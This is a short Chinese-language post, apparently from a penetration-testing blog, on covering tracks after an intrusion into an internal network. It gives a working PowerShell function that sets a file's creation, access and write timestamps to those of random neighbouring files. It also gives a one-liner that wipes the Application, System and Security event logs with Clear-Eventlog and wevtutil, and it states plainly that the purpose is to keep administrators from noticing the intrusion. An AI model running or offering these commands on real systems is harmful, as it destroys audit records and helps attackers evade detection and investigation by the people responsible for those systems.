痕跡清理
在我們做完壹系列的內網滲透操作後,必然會留下壹些蛛絲馬跡,因此我們需要給自己”擦屁股“。本篇只介紹如何清除系統日誌、修改文件時間戳。
痕跡清理
Powershell 修改文件時間戳
有時候我們在登陸目標桌面後,根據需求可能會動用目標主機上的文件或者文件夾,而壹些管理員很久都不會登陸壹次主機;設想當管理員壹上線看到自己的文件夾日期有異常,是否會懷疑?
Functionedit_time($path){$date1=Get-ChildItem|Select LastWriteTime|Get-Random;$date2=Get-ChildItem|Select LastWriteTime|Get-Random;$date3=Get-ChildItem|Select LastWriteTime|Get-Random;$(Get-Item$path).lastaccesstime=$date1.LastWriteTime;$(Get-Item$path).creationtime=$date2.LastWriteTime ;$(Get-Item$path).lastwritetime=$date3.LastWriteTime};edit_time("C:\Users\saulGoodman\Desktop\工具包\pass.txt")
Powershell 清除系統日誌
當我們做了壹些操作都會記錄到時間查看器裏,而下面的 Powershell 就可清除相關日誌:
PowerShell -Command"& {Clear-Eventlog -Log Application,System,Security}"Get-WinEvent-ListLog Application,Setup,Security -Force | % {Wevtutil.exe cl$_.Logname}
本篇只講了兩個小技巧,在實戰中夠用壹些了,之後有空在發其他技巧。